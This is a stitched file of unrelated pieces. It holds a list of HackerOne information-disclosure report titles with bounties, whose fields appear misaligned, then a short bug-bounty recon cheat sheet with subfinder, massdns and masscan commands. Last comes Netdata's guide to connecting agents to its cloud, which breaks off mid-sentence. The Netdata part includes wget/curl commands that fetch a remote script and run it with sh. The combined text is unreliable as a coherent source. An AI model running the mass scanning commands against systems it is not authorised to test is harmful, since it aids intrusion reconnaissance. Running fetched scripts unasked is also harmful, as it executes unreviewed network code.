### Bounty paid
$500
---
### Title
Scrollbar Width permits detecting browser platform
#### URL
https://hackerone.com/reports/252580
#### Severity score
null
#### Reporter
hackerfactor
### Bounty paid
$100
---
### Title
Vulnerable Javascript library
#### URL
https://hackerone.com/reports/145517
#### Severity score
null
#### Reporter
paulochoupina
### Bounty paid
null
---
### Title
Program profile metrics endpoint contains mean time to triage, even when turned off
#### URL
https://hackerone.com/reports/289568
#### Severity score
5
#### Reporter
flashdisk
### Bounty paid
$500
---
### Title
Credential gets exposed
#### URL
https://hackerone.com/reports/255132
#### Severity score
null
#### Reporter
luke081515
### Bounty paid
null
---
### Title
Information Disclosure
#### URL
https://hackerone.com/reports/1091
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
null
---
### Title
Partial PII leakage due to public set gitlab
#### URL
https://hackerone.com/reports/375091
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Team object exposes amount of participants in a private program to non-invited users
#### URL
https://hackerone.com/reports/380317
#### Severity score
4.4
#### Reporter
kapytein
### Bounty paid
$5,000
---
### Title
H1514 Deanonymizing Exchange Marketplace private listings
#### URL
https://hackerone.com/reports/421009
#### Severity score
5.3
#### Reporter
fisher
### Bounty paid
$1,000
---
### Title
Открытые сорцы
#### URL
https://hackerone.com/reports/518081
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
The web application https://mavenlink.com discloses version details of the underlying Platform / Server
#### URL
https://hackerone.com/reports/14529
#### Severity score
null
#### Reporter
blackb0xl33t
### Bounty paid
null
---
### Title
Information disclosure via policy update notifications after removal from program
#### URL
https://hackerone.com/reports/177484
#### Severity score
3.5
#### Reporter
staytuned
### Bounty paid
null
---
### Title
Image Injection vulnerability on screenshot-viewer/responsive/image may allow Facebook OAuth token theft.
#### URL
https://hackerone.com/reports/655288
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Раскрытие серии/номера паспорта и снилс пользователя lootdog.io
#### URL
https://hackerone.com/reports/356322
#### Severity score
3.4
#### Reporter
circuit
### Bounty paid
$250
---
### Title
invite1.us2.msg.vip.bf1.yahoo.com/ - CSRF/email disclosure
#### URL
https://hackerone.com/reports/7608
#### Severity score
null
#### Reporter
nnwakelam
### Bounty paid
$400
---
### Title
Information Disclosure That shows the webroot of CoinBase Server
#### URL
https://hackerone.com/reports/5073
#### Severity score
null
#### Reporter
mazen160
### Bounty paid
null
---
### Title
The special code in editor has no Authority control and can lead to Information Disclosure
#### URL
https://hackerone.com/reports/221950
#### Severity score
null
#### Reporter
xifengweiyu
### Bounty paid
null
---
### Title
Sensitive information contained with New Relic APM iOS application
#### URL
https://hackerone.com/reports/130739
#### Severity score
null
#### Reporter
todayisnew
### Bounty paid
null
---
### Title
Exposes a series of other private credentials
#### URL
https://hackerone.com/reports/289189
#### Severity score
null
#### Reporter
4w3
### Bounty paid
null
---
### Title
Full access to Amazon S3 bucket containing AWS CloudTrail logs
#### URL
https://hackerone.com/reports/111643
#### Severity score
null
#### Reporter
koenrh
### Bounty paid
$500
---
### Title
Unauthorized access to metadata of undisclosed reports that were retested
#### URL
https://hackerone.com/reports/871749
#### Severity score
5
#### Reporter
msdian7
### Bounty paid
$2,500
---
### Title
[online.games.mail.ru] - Sensitive information disclosure
#### URL
https://hackerone.com/reports/317980
#### Severity score
null
#### Reporter
godex
### Bounty paid
$100
---
### Title
Team object in GraphQL that have a published external program may expose existence of a private program
#### URL
https://hackerone.com/reports/347937
#### Severity score
null
#### Reporter
nismo
### Bounty paid
null
---
### Title
CSS leaks SCSS debug info
#### URL
https://hackerone.com/reports/2221
#### Severity score
null
#### Reporter
guido
### Bounty paid
$100
---
### Title
Access to multiple production Grafana dashboards
#### URL
https://hackerone.com/reports/663628
#### Severity score
null
#### Reporter
damian89
### Bounty paid
$10,000
---
### Title
IDOR - Folder names disclosure inside a domain, regardless of user
#### URL
https://hackerone.com/reports/194574
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$250
---
### Title
Contacts menu (not app) fails to restrict (to local groups) for contacts from federated servers
#### URL
https://hackerone.com/reports/895730
#### Severity score
3.2
#### Reporter
nursoda
### Bounty paid
null
---
### Title
Username&password is Disclosure in readme file in [https://█████████]
#### URL
https://hackerone.com/reports/804980
#### Severity score
null
#### Reporter
yghonem
### Bounty paid
null
---
### Title
Cache-Control Misconfiguration Leads to Sensitive Information Leakage
#### URL
https://hackerone.com/reports/132835
#### Severity score
null
#### Reporter
geekboy
### Bounty paid
null
---
### Title
SharePoint exposed web services
#### URL
https://hackerone.com/reports/300540
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Public calendar link can be invisible
#### URL
https://hackerone.com/reports/246055
#### Severity score
null
#### Reporter
faisal2542
### Bounty paid
null
---
### Title
Last build status and coverage leaked to unauthorized users
#### URL
https://hackerone.com/reports/477222
#### Severity score
null
#### Reporter
xanbanx
### Bounty paid
$750
---
### Title
[opensource.mail.ru] Debug Mode
#### URL
https://hackerone.com/reports/99054
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
### Title
Disclosure of personal support email addresses on 'support-fleet.city-mobil.ru'
#### URL
https://hackerone.com/reports/950485
#### Severity score
null
#### Reporter
olidayw
### Bounty paid
$150
---
### Title
Apache documentation
#### URL
https://hackerone.com/reports/90321
#### Severity score
null
#### Reporter
ba4fe4ca95021d367f8a574
### Bounty paid
null
---
### Title
Path Disclosure Vulnerability
#### URL
https://hackerone.com/reports/11729
#### Severity score
null
#### Reporter
jamalcom
### Bounty paid
null
---
### Title
Configuartion [Sensitive] Information Disclosure
#### URL
https://hackerone.com/reports/774872
#### Severity score
null
#### Reporter
barsainya
### Bounty paid
null
---
### Title
Unupdated ImageMagic leads to uninitialized server memory disclosure
#### URL
https://hackerone.com/reports/274594
#### Severity score
null
#### Reporter
chaosbolt
### Bounty paid
$150
---
### Title
Access MoPub Reports Data even after Company removed you from their MoPub Account.
#### URL
https://hackerone.com/reports/399174
#### Severity score
null
#### Reporter
suyog
### Bounty paid
$140
---
### Title
Web cache deception attack on https://open.vanillaforums.com/messages/all
#### URL
https://hackerone.com/reports/593712
#### Severity score
4.3
#### Reporter
ronr
### Bounty paid
$150
---
### Title
Django debug enabled showing information about system, database, configuration files.
#### URL
https://hackerone.com/reports/963164
#### Severity score
null
#### Reporter
vbdev
### Bounty paid
null
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/115337
#### Severity score
null
#### Reporter
supernatural
### Bounty paid
$50
---
### Title
Read files on application server, leads to RCE
#### URL
https://hackerone.com/reports/178152
#### Severity score
9
#### Reporter
jobert
### Bounty paid
null
---
### Title
Profile Pic padding (Length-hiding) fails due to use of GZIP
#### URL
https://hackerone.com/reports/29835
#### Severity score
null
#### Reporter
ericlaw
### Bounty paid
$280
---
### Title
Verification of email addresses possible through https://www.yelp.com/signup/facebook
#### URL
https://hackerone.com/reports/194721
#### Severity score
null
#### Reporter
coder13
### Bounty paid
$100
---
### Title
[info.tmgame.mail.ru] Apache Server Status
#### URL
https://hackerone.com/reports/388746
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Getting Error Message and in use python version 2.7 is exposed.
#### URL
https://hackerone.com/reports/128041
#### Severity score
null
#### Reporter
niputiwari
### Bounty paid
null
---
### Title
[allods.my.com] Full SQL Disclosure
#### URL
https://hackerone.com/reports/97317
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
|
# BugBounty
Cheat Sheets, Methodologies etc.
## Subdomain Scraping
### Subfinder
[https://github.com/ice3man543/subfinder](https://github.com/ice3man543/subfinder)
`subfinder -d domain.name -o /path/to/output`
## DNS Resolving
### MassDNS
[https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns)
`massdns -r ./massdns/lists/resolvers.txt -t A -o S /path/to/subfinderoutput > /path/to/output`
Get uniq IPs:
`cat /path/to/massdnsoutput | grep -E "A " | sed 's/.*A //' | sort | uniq > UniqIPs.txt`
## Port Scanning
### Masscan
[https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan)
`masscan -iL UniqIPs.txt -p<portrange> --rate <somerate> > /path/to/output`
|
<!--
title: "Connect Agent to Cloud"
description: "Connecting a Netdata Agent, running on a distributed node, to Netdata Cloud securely via the encrypted Agent-Cloud link (ACLK)."
custom_edit_url: https://github.com/netdata/netdata/edit/master/claim/README.md
-->
# Connect Agent to Cloud
You can securely connect a Netdata Agent, running on a distributed node, to Netdata Cloud. A Space's
administrator creates a **claiming token**, which is used to add an Agent to their Space via the [Agent-Cloud link
(ACLK)](/aclk/README.md).
Are you just starting out with Netdata Cloud? See our [get started with
Cloud](https://learn.netdata.cloud/docs/cloud/get-started) guide for a walkthrough of the process and simplified
instructions.
When connecting an agent (also referred to as a node) to Netdata Cloud, you must complete a verification process that proves you have some level of authorization to manage the node itself. This verification is a security feature that helps prevent unauthorized users from seeing the data on your node.
Only the administrators of a Space in Netdata Cloud can view the claiming token and accompanying script generated by
Netdata Cloud.
> The connection process ensures no third party can add your node, and then view your node's metrics, in a Cloud account,
> Space, or War Room that you did not authorize.
By connecting a node, you opt-in to sending data from your Agent to Netdata Cloud via the [ACLK](/aclk/README.md). This
data is encrypted by TLS while it is in transit. We use the RSA keypair created during the connection process to authenticate the
identity of the Netdata Agent when it connects to the Cloud. While the data does flow through Netdata Cloud servers on its way
from Agents to the browser, we do not store or log it.
You can connect a node during the Netdata Cloud onboarding process, or after you created a Space by clicking on **Connect
Nodes** in the [Spaces management area](https://learn.netdata.cloud/docs/cloud/spaces#manage-spaces).
There are two important notes regarding connecting nodes:
- _You can only connect any given node in a single Space_. You can, however, add that connected node to multiple War Rooms
within that one Space.
- You must repeat the connection process on every node you want to add to Netdata Cloud.
## How to connect a node
There will be three main flows from where you might want to connect a node to Netdata Cloud.
* when you are on an [
War Room](#empty-war-room) and you want to connect your first node
* when you are at the [Manage Space](#manage-space-or-war-room) area and you select **Connect Nodes** to connect a node, coming from Manage Space or Manage War Room
* when you are on the [Nodes view page](https://learn.netdata.cloud/docs/cloud/visualize/nodes) and want to connect a node - this process falls into the [Manage Space](#manage-space-or-war-room) flow
Please note that only the administrators of a Space in Netdata Cloud can view the claiming token and accompanying script, generated by Netdata Cloud, to trigger the connection process.
### Empty War Room
Either at your first sign in or following ones, when you enter Netdata Cloud and are at a War Room that doesn’t have any node added to it, you will be able to:
* connect a new node to Netdata Cloud and add it to the War Room
* add a previously connected node to the War Room
If your case is to connect a new node and add it to the War Room, you will need to tell us what environment the node is running on (Linux, Docker, macOS, Kubernetes) and then we will provide you with a script to initiate the connection process. You just will need to copy and paste it into your node's terminal. See one of the following sections depending on your case:
* [Linux](#connect-an-agent-running-in-linux)
* [Docker](#connect-an-agent-running-in-docker)
* [macOS](#connect-an-agent-running-in-macos)
* [Kubernetes](#connect-a-kubernetes-clusters-parent-netdata-pod)
Repeat this process with every node you want to add to Netdata Cloud during onboarding. You can also add more nodes once you've
finished onboarding.
### Manage Space or War Room
To connect a node, select which War Rooms you want to add this node to with the dropdown, then copy and paste the script
given by Netdata Cloud into your node's terminal.
When coming from [Nodes view page](https://learn.netdata.cloud/docs/cloud/visualize/nodes) the room parameter is already defined to current War Room.
### Connect an agent running in Linux
If you want to connect a node that is running on a Linux environment, the script that will be provided to you by Netdata Cloud is the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) which will install the Netdata Agent on your node, if it isn't already installed, and connect the node to Netdata Cloud. It should be similar to:
```
wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud
```
The script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if you don't see
the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).
Please note that to run it you will either need to have root privileges or run it with the user that is running the agent, more details on the [Connect an agent without root privileges](#connect-an-agent-without-root-privileges) section.
For more details on what are the extra parameters `claim-token`, `claim-rooms` and `claim-url` please refer to [Connect node to Netdata Cloud during installation](/packaging/installer/methods/kickstart.md#connect-node-to-netdata-cloud-during-installation).
### Connect an agent without root privileges
If you don't want to run the installation script to connect your nodes to Netdata Cloud with root privileges, you can discover which user is running the Agent,
switch to that user, and run the script.
Use `grep` to search your `netdata.conf` file, which is typically located at `/etc/netdata/netdata.conf`, for the `run
as user` setting. For example:
To connect a node, select which War Rooms you want to add this node to with the dropdown, then copy and paste the script
given by Netdata Cloud into your node's terminal.
```bash
grep "run as user" /etc/netdata/netdata.conf
# run as user = netdata
```
The default user is `netdata`. Yours may be different, so pay attention to the output from `grep`. Switch to that user
and run the script.
```bash
wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud
```
### Connect an agent running in Docker
To connect an instance of the Netdata Agent running inside of a Docker container, it is recommended that you follow
the instructions and use the commands provided either in the `Nodes` tab of an [empty War Room](#empty-war-room) on Netdata Cloud or
in the shelf that appears when you click **Connect Nodes** and select **Docker**.
However, users can also claim a new node by claiming environment variables in the container to have it automatically
connected on startup or restart.
For the connection process to work, the contents of `/var/lib/netdata` _must_ be preserved across container
restarts using a persistent volume. See our [recommended `docker run` and Docker Compose
examples](/packaging/docker/README.md#create-a-new-netdata-agent-container) for details.
#### Known issues on older hosts with seccomp enabled
The nodes running on the following hosts **cannot be claimed**:
- `libseccomp` version less than v2.3.3.
- Docker version less than v18.04.0-ce.
- The kernel is configured with CONFIG_SECCOMP enabled.
To check if your kernel supports `seccomp`:
```cmd
# grep CONFIG_SECCOMP= /boot/config-$(uname -r) 2>/dev/null || zgrep CONFIG_SECCOMP /proc/config.gz 2>/dev/null
CONFIG_SECCOMP=y
```
To resolve the issue, do one of the following actions:
- Update to a newer version of Docker and `libseccomp` (recommended).
- Create a custom profile and pass it for the container.
- Run [without the default seccomp profile](https://docs.docker.com/engine/security/seccomp/#run-without-the-default-seccomp-profile) (unsafe, not recommended).
<details>
<summary>See how to create a custom profile</summary>
1. Download the moby default seccomp profile and change `defaultAction` to `SCMP_ACT_TRACE` on line 2.
```cmd
sudo wget https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json -O /etc/docker/seccomp.json
sudo sed -i '2s/SCMP_ACT_ERRNO/SCMP_ACT_TRACE/' /etc/docker/seccomp.json
```
2. Specify the new policy for the container explicitly.
- When using `docker run`:
```cmd
docker run -d --name=netdata \
--security-opt=seccomp=/etc/docker/seccomp.json \
...
```
- When using `docker-compose`:
> :warning: The security_opt option is ignored when deploying a stack in swarm mode.
```yaml
version: '3'
services:
netdata:
security_opt:
- seccomp:/etc/docker/seccomp.json
...
```
- When using `docker stack deploy`:
Change the default profile globally by adding `--seccomp-profile=/etc/docker/seccomp.json` to the options passed to
dockerd on startup.
</details>
#### Using environment variables
The Netdata Docker container looks for the following environment variables on startup:
- `NETDATA_CLAIM_TOKEN`
- `NETDATA_CLAIM_URL`
- `NETDATA_CLAIM_ROOMS`
- `NETDATA_CLAIM_PROXY`
If the token and URL are specified in their corresponding variables _and_ the container is not already connected,
it will use these values to attempt to connect the container, automatically adding the node to the specified War
Rooms. If a proxy is specified, it will be used for the connection process and for connecting to Netdata Cloud.
These variables can be specified using any mechanism supported by your container tooling for setting environment
variables inside containers.
When using the `docker run` command, if you have an agent container already running, it is important to know that there will be a short period of downtime. This is due to the process of recreating the new agent container.
The command to connect a new node to Netdata Cloud is:
```bash
docker run -d --name=netdata \
-p 19999:19999 \
-v netdataconfig:/etc/netdata \
-v netdatalib:/var/lib/netdata \
-v netdatacache:/var/cache/netdata \
-v /etc/passwd:/host/etc/passwd:ro \
-v /etc/group:/host/etc/group:ro \
-v /proc:/host/proc:ro \
-v /sys:/host/sys:ro \
-v /etc/os-release:/host/etc/os-release:ro \
--restart unless-stopped \
--cap-add SYS_PTRACE \
--security-opt apparmor=unconfined \
-e NETDATA_CLAIM_TOKEN=TOKEN \
-e NETDATA_CLAIM_URL="https://api.netdata.cloud" \
-e NETDATA_CLAIM_ROOMS=ROOM1,ROOM2 \
-e NETDATA_CLAIM_PROXY=PROXY \
netdata/netdata
```
>Note: This command is suggested for connecting a new container. Using this command for an existing container recreates the container, though data
and configuration of the old container may be preserved. If you are claiming an existing container that can not be recreated,
you can add the container by going to Netdata Cloud, clicking the **Nodes** tab, clicking **Connect Nodes**, selecting **Docker**, and following
the instructions and commands provided or by following the instructions in an [empty War Room](#empty-war-room).
The output that would be seen from the connection process when using other methods will be present in the container logs.
Using the environment variables like this to handle the connection process is the preferred method of connecting Docker containers
as it works in the widest variety of situations and simplifies configuration management.
#### Using Docker compose
If you use `docker compose`, you can copy the config provided by Netdata Cloud, which should be same as the one below:
```bash
version: '3'
services:
netdata:
image: netdata/netdata
container_name: netdata
hostname: example.com # set to fqdn of host
ports:
- 19999:19999
restart: unless-stopped
cap_add:
- SYS_PTRACE
security_opt:
- apparmor:unconfined
volumes:
- netdataconfig:/etc/netdata
- netdatalib:/var/lib/netdata
- netdatacache:/var/cache/netdata
- /etc/passwd:/host/etc/passwd:ro
- /etc/group:/host/etc/group:ro
- /proc:/host/proc:ro
- /sys:/host/sys:ro
- /etc/os-release:/host/etc/os-release:ro
environment:
- NETDATA_CLAIM_TOKEN=TOKEN
- NETDATA_CLAIM_URL="https://api.netdata.cloud"
- NETDATA_CLAIM_ROOMS=ROOM1,ROOM2
volumes:
netdataconfig:
netdatalib:
netdatacache:
```
Then run the following command in the same directory as the `docker-compose.yml` file to start the container.
```bash
docker-compose up -d
```
#### Using docker exec
Connect a _running Netdata Agent container_, where you don't want to recreate the existing container, append the script offered by Netdata Cloud to a `docker exec ...` command, replacing
`netdata` with the name of your running container:
```bash
docker exec -it netdata netdata-claim.sh -token=TOKEN -rooms=ROOM1,ROOM2 -url=https://api.netdata.cloud
```
The values for `ROOM1,ROOM2` can be found by by going to Netdata Cloud, clicking the **Nodes** tab, clicking **Connect Nodes**, selecting **Docker**, and copying the `rooms=` value in the command provided.
The script should return `Agent was successfully claimed.`. If the connection process returns errors, or if
you don't see the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).
### Connect an agent running in macOS
To connect a node that is running on a macOS environment the script that will be provided to you by Netdata Cloud is the [kickstart](/packaging/installer/methods/macos.md#install-netdata-with-our-automatic-one-line-installation-script) which will install the Netdata Agent on your node, if it isn't already installed, and connect the node to Netdata Cloud. It should be similar to:
```bash
curl https://my-netdata.io/kickstart.sh > /tmp/netdata-kickstart.sh && sh /tmp/netdata-kickstart.sh --install /usr/local/ --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud
```
The script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if you don't see
the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).
### Connect a Kubernetes cluster's parent Netdata pod
Read our [Kubernetes installation](/packaging/installer/methods/kubernetes.md#connect-your-kubernetes-cluster-to-netdata-cloud)
for details on connecting a parent Netdata pod.
### Connect through a proxy
A Space's administrator can connect a node through HTTP(S) proxy.
You should first configure the proxy in the `[cloud]` section of `netdata.conf`. The proxy settings you specify here
will also be used to tunnel the ACLK. The default `proxy` setting is `none`.
```conf
[cloud]
proxy = none
```
The `proxy` setting can take one of the following values:
- `none`: Do not use a proxy, even if the system configured otherwise.
- `env`: Try to read proxy settings from set environment variables `http_proxy`.
- `http://[user:pass@]host:ip`: The ACLK and connection process will use the specified HTTP(S) proxy.
For example, a HTTP proxy setting may look like the following:
```conf
[cloud]
proxy = http://203.0.113.0:1080 # With an IP address
proxy = http://proxy.example.com:1080 # With a URL
```
You can now move on to connecting. When you connect with the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) script, add the `--claim-proxy=` parameter and
append the same proxy setting you added to `netdata.conf`.
```bash
wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud --claim-proxy http://[user:pass@]host:ip
```
Hit **Enter**. The script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if
you don't see the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).
### Troubleshooting
If you're having trouble connecting a node, this may be because the [ACLK](/aclk/README.md) cannot connect to Cloud.
With the Netdata Agent running, visit `http://NODE:19999/api/v1/info` in your browser, replacing `NODE` with the IP
address or hostname of your Agent. The returned JSON contains four keys that will be helpful to diagnose any issues you
might be having with the ACLK or connection process.
```json
"cloud-enabled"
"cloud-available"
"agent-claimed"
"aclk-available"
```
On Netdata agent version `1.32` (`netdata -v` to find your version) and newer, the `netdata -W aclk-state` command can be used to get some diagnostic information about ACLK. Sample output:
```
ACLK Available: Yes
ACLK Implementation: Next Generation
New Cloud Protocol Support: Yes
Claimed: Yes
Claimed Id: 53aa76c2-8af5-448f-849a-b16872cc4ba1
Online: Yes
Used Cloud Protocol: New
```
Use these keys and the information below to troubleshoot the ACLK.
#### kickstart: unsupported Netdata installation
If you run the kickstart script and get the following error `Existing install appears to be handled manually or through the system package manager.` you most probably installed Netdata using an unsupported package.
If you are using an unsupported package, such as a third-party `.deb`/`.rpm` package provided by your distribution,
please remove that package and reinstall using our [recommended kickstart
script](/docs/get-started.mdx#install-on-linux-with-one-line-installer).
#### kickstart: Failed to write new machine GUID
If you run the kickstart script but don't have privileges required for the actions done on the connecting to Netdata Cloud process you will get the following error:
```bash
Failed to write new machine GUID. Please make sure you have rights to write to /var/lib/netdata/registry/netdata.public.unique.id.
```
For a successful execution you will need to run the script with root privileges or run it with the user that is running the agent, more details on the [Connect an agent without root privileges](#connect-an-agent-without-root-privileges) section.
#### bash: netdata-claim.sh: command not found
If you run the claiming script and see a `command not found` error, you either installed Netdata in a non-standard
location or are using an unsupported package. If you installed Netdata in a non-standard path using the `--install`
option, you need to update your `$PATH` or run `netdata-claim.sh` using the full path. For example, if you installed
Netdata to `/opt/netdata`, use `/opt/netdata/bin/netdata-claim.sh` to run the claiming script.
If you are using an unsupported package, such as a third-party `.deb`/`.rpm` package provided by your distribution,
please remove that package and reinstall using our [recommended kickstart
script](/docs/get-started.mdx#install-on-linux-with-one-line-installer).
#### Connecting on older distributions (Ubuntu 14.04, Debian 8, CentOS 6)
If you're running an older Linux distribution or one that has reached EOL, such as Ubuntu 14.04 LTS, Debian 8, or CentOS
6, your Agent may not be able to securely connect to Netdata Cloud due to an outdated version of OpenSSL. These old
versions of OpenSSL cannot perform [hostname validation](https://wiki.openssl.org/index.php/Hostname_validation), which
helps securely encrypt SSL connections.
We recommend you reinstall Netdata with a [static build](/packaging/installer/methods/kickstart.md#static-builds), which uses an
up-to-date version of OpenSSL with hostname validation enabled.
If you choose to continue using the outdated version of OpenSSL, your node will still connect to Netdata Cloud, albeit
with hostname verification disabled. Without verification, your Netdata Cloud connection could be vulnerable to
man-in-the-middle attacks.
#### cloud-enabled is false
If `cloud-enabled` is `false`, you probably ran the installer with `--disable-cloud` option.
Additionally, check that the `enabled` setting in `var/lib/netdata/cloud.d/cloud.conf` is set to `true`:
```conf
[global]
enabled = true
```
To fix this issue, reinstall Netdata using your [preferred method](/packaging/installer/README.md) and do not add the
`--disable-cloud` option.
#### cloud-available is false / ACLK Available: No
If `cloud-available` is `false` after you verified Cloud is enabled in the previous step, the most likely issue is that
Cloud features failed to build during installation.
If Cloud features fail to build, the installer continues and finishes the process without Cloud functionality as opposed
to failing the installation altogether. We do this to ensure the Agent will always finish installing.
If you can't see an explicit error in the installer's output, you can run the installer with the `--require-cloud`
option. This option causes the installation to fail if Cloud functionality can't be built and enabled, and the
installer's output should give you more error details.
You may see one of the following error messages during installation:
- Failed to build libmosquitto. The install process will continue, but you will not be able to connect this node to
Netdata Cloud.
- Unable to fetch sources for libmosquitto. The install process will continue, but you will not be able to connect
this node to Netdata Cloud.
- Failed to build libwebsockets. The install process will continue, but you may not be able to connect this node to
Netdata Cloud.
- Unable to fetch sources for libwebsockets. The install process will continue, but you may not be able to connect
this node to Netdata Cloud.
- Could not find cmake, which is required to build libwebsockets. The install process will continue, but you may not
be able to connect this node to Netdata Cloud.
- Could not find cmake, which is required to build JSON-C. The install process will continue, but Netdata Cloud
support will be disabled.
- Failed to build JSON-C. Netdata Cloud support will be disabled.
- Unable to fetch sources for JSON-C. Netdata Cloud support will be disabled.
One common cause of the installer failing to build Cloud features is not having one of the following dependencies on
your system: `cmake`, `json-c` and `OpenSSL`, including corresponding `devel` packages.
You can also look for error messages in `/var/log/netdata/error.log`. Try one of the following two commands to search
for ACLK-related errors.
```bash
less /var/log/netdata/error.log
grep -i ACLK /var/log/netdata/error.log
```
If the installer's output does not help you enable Cloud features, contact us by [creating an issue on
GitHub](https://github.com/netdata/netdata/issues/new?assignees=&labels=bug%2Cneeds+triage&template=BUG_REPORT.yml&title=The+installer+failed+to+prepare+the+required+dependencies+for+Netdata+Cloud+functionality)
with details about your system and relevant output from `error.log`.
#### agent-claimed is false / Claimed: No
You must [connect your node](#how-to-connect-a-node).
#### aclk-available is false / Online: No
If `aclk-available` is `false` and all other keys are `true`, your Agent is having trouble connecting to the Cloud
through the ACLK. Please check your system's firewall.
If your Agent needs to use a proxy to access the internet, you must [set up a proxy for
connecting](#connect-through-a-proxy).
If you are certain firewall and proxy settings are not the issue, you should consult the Agent's `error.log` at
`/var/log/netdata/error.log` and contact us by [creating an issue on
GitHub](https://github.com/netdata/netdata/issues/new?assignees=&labels=bug%2Cneeds+triage&template=BUG_REPORT.yml&title=ACLK-available-is-false)
with details about your system and relevant output from `error.log`.
### Remove and reconnect a node
To remove a node from your Space in Netdata Cloud, delete the `cloud.d/` directory in your Netdata library directory.
```bash
cd /var/lib/netdata # Replace with your Netdata library directory, if not /var/lib/netdata/
sudo rm -rf cloud.d/
```
This node no longer has access to the credentials it was used when connecting to Netdata Cloud via the ACLK.
You will still be able to see this node in your War Rooms in an **unreachable** state.
If you want to reconnect this node, you need to:
1. Ensure that the `/var/lib/netdata/cloud.d` directory doesn't exist. In some installations, the path is `/opt/netdata/var/lib/netdata/cloud.d`.
2. Stop the agent.
3. Ensure that the `uuidgen-runtime` package is installed. Run ```echo "$(uuidgen)"``` and validate you get back a UUID.
4. Copy the kickstart.sh command to add a node from your space and add to the end of it `--claim-id "$(uuidgen)"`. Run the command and look for the message `Node was successfully claimed.`
5. Start the agent
## Connecting reference
In the sections below, you can find reference material for the kickstart script, claiming script, connecting via the Agent's command line
tool, and details about the files found in `cloud.d`.
### The `cloud.conf` file
This section defines how and whether your Agent connects to [Netdata Cloud](https://learn.netdata.cloud/docs/cloud/)
using the [ACLK](/aclk/README.md).
| setting | default | info |
|:-------------- |:------------------------- |:-------------------------------------------------------------------------------------------------------------------------------------- |
| cloud base url | https://api.netdata.cloud | The URL for the Netdata Cloud web application. You should not change this. If you want to disable Cloud, change the `enabled` setting. |
| enabled | yes | The runtime option to disable the [Agent-Cloud link](/aclk/README.md) and prevent your Agent from connecting to Netdata Cloud. |
### kickstart script
The best way to install Netdata and connect your nodes to Netdata Cloud is with our automatic one-line installation script, [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script). This script will install the Netdata Agent, in case it isn't already installed, and connect your node to Netdata Cloud.
This works with:
* most Linux distributions, see [Netdata's platform support policy](/packaging/PLATFORM_SUPPORT.md)
* macOS
For details on how to run this script please check [How to connect a node](#how-to-connect-a-node) and choose your environment.
In case Netdata Agent is already installed and you run this script to connect a node to Netdata Cloud it will not upgrade your agent automatically. If you also want to upgrade the Agent installation you'll need to run the script again without the connection options.
Our suggestion is to first run kickstart to upgrade your agent by running the command below and the run the [How to connect a node]
(#how-to-connect-a-node).
**Linux**
```bash
wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh
```
**macOS**
```bash
curl https://my-netdata.io/kickstart.sh > /tmp/netdata-kickstart.sh && sh /tmp/netdata-kickstart.sh --install /usr/local/
```
### Claiming script
A Space's administrator can also connect an Agent by directly calling the `netdata-claim.sh` script either with root privileges
using `sudo`, or as the user running the Agent (typically `netdata`), and passing the following arguments:
```sh
-token=TOKEN
where TOKEN is the Space's claiming token.
-rooms=ROOM1,ROOM2,...
where ROOMX is the War Room this node should be added to. This list is optional.
-url=URL_BASE
where URL_BASE is the Netdata Cloud endpoint base URL. By default, this is https://api.netdata.cloud.
-id=AGENT_ID
where AGENT_ID is the unique identifier of the Agent. This is the Agent's MACHINE_GUID by default.
-hostname=HOSTNAME
where HOSTNAME is the result of the hostname command by default.
-proxy=PROXY_URL
where PROXY_URL is the endpoint of a HTTP or HTTPS proxy.
```
For example, the following command connects an Agent and adds it to rooms `room1` and `room2`:
```sh
netdata-claim.sh -token=MYTOKEN1234567 -rooms=room1,room2
```
You should then update the `netdata` service about the result with `netdatacli`:
```sh
netdatacli reload-claiming-state
```
This reloads the Agent connection state from disk.
Our recommendation is to trigger the connection process using the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) whenever possible.
### Netdata Agent command line
If a Netdata Agent is running, the Space's administrator can connect a node using the `netdata` service binary with
additional command line parameters:
```sh
-W "claim -token=TOKEN -rooms=ROOM1,ROOM2"
```
For example:
```sh
/usr/sbin/netdata -D -W "claim -token=MYTOKEN1234567 -rooms=room1,room2"
```
If need be, the user can override the Agent's defaults by providing additional arguments like those described
[here](#claiming-script).
### Connection directory
Netdata stores the Agent's connection-related state in the Netdata library directory under `cloud.d`. For a default
installation, this directory exists at `/var/lib/netdata/cloud.d`. The directory and its files should be owned by the
